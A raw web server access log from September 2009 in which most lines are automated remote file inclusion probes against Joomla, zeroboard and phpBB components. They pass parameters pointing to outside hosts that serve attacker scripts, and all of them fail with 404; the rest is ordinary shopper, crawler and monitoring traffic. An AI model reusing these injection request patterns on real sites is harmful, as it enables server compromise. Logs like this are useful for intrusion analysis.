114.108.131.141 - - [04/Sep/2009:03:17:34 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:35 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:37 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:18:15 -0400] "GET /logs/access_log.Q109082000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:18:23 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:18:41 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:18:41 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:18:41 -0400] "GET /logs/error_log.Q109081300%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:18:44 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:18:46 -0400] "GET /logs/access_log.Q109081300%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:18:49 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:18:53 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:18:56 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:18:59 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:19:01 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:19:01 -0400] "GET /logs/access_log.Q109061900%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:19:02 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:19:56 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:19:56 -0400] "GET /logs/error_log.Q109060100%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
208.80.195.33 - - [04/Sep/2009:03:20:00 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; yplus 5.6.04)"
203.236.100.30 - - [04/Sep/2009:03:20:00 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:20:11 -0400] "GET /logs/error_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:20:17 -0400] "GET /logs/error_log.Q109070400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
123.125.66.91 - - [04/Sep/2009:03:20:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.236.100.30 - - [04/Sep/2009:03:21:16 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:21:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.19.68.201 - - [04/Sep/2009:03:21:26 -0400] "GET /logs/nav.php?pagina=http://catedralsoftware.com/servicios/Fx29ID.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
189.19.68.201 - - [04/Sep/2009:03:21:26 -0400] "GET /logs/access_log.Q109060500/nav.php?pagina=http://catedralsoftware.com/servicios/Fx29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.19.68.201 - - [04/Sep/2009:03:21:26 -0400] "GET /nav.php?pagina=http://catedralsoftware.com/servicios/Fx29ID.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
189.19.68.201 - - [04/Sep/2009:03:21:26 -0400] "GET /logs/access_log.Q109071100/nav.php?pagina=http://catedralsoftware.com/servicios/Fx29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:21:28 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:34 -0400] "GET /logs/access_log.Q109072200%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:39 -0400] "GET /logs/access_log.Q109050800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:39 -0400] "GET /logs/access_log.Q109061400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:44 -0400] "GET /logs/error_log.Q109061400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:49 -0400] "GET /logs/error_log.Q109052800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:21:54 -0400] "GET /logs/error_log.Q109071800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:22:34 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:03:22:38 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:03:22:43 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:23:13 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kalman.co.kr/bbs//skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:23:13 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kalman.co.kr/bbs//skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:23:13 -0400] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kalman.co.kr/bbs//skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
189.19.68.201 - - [04/Sep/2009:03:23:21 -0400] "GET /logs/access_log.Q109071100%20%20/nav.php?pagina=http://catedralsoftware.com/servicios/Fx29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:23:27 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:23:27 -0400] "GET /logs/error_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
204.208.240.55 - - [04/Sep/2009:03:24:33 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:33 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:42 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:55 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020 HTTP/1.0" 200 38036 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:56 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:57 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:57 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:58 -0400] "GET /images/head_surgical-supply.gif HTTP/1.0" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:58 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:58 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:58 -0400] "GET /images/head_btn-seminars.gif HTTP/1.0" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:59 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:24:59 -0400] "GET /images/head_btn-conventions.gif HTTP/1.0" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:00 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.0" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:01 -0400] "GET /images/blend.jpg HTTP/1.0" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.0" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.0" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.0" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:02 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:25:04 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):003-4020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.47.128.166 - - [04/Sep/2009:03:25:18 -0400] "GET //skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:25:18 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:25:18 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.208.240.55 - - [04/Sep/2009:03:25:23 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ace%20new%20gauze HTTP/1.0" 200 38023 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.47.128.166 - - [04/Sep/2009:03:25:30 -0400] "GET //skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:25:30 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:25:30 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
140.99.35.218 - - [04/Sep/2009:03:25:54 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:25:55 -0400] "GET /logs/access_log.Q109080800//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
140.99.35.218 - - [04/Sep/2009:03:25:57 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
140.99.35.218 - - [04/Sep/2009:03:26:00 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
204.208.240.55 - - [04/Sep/2009:03:26:00 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020 HTTP/1.0" 200 45649 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:03 -0400] "GET /images/pf-a.gif HTTP/1.0" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
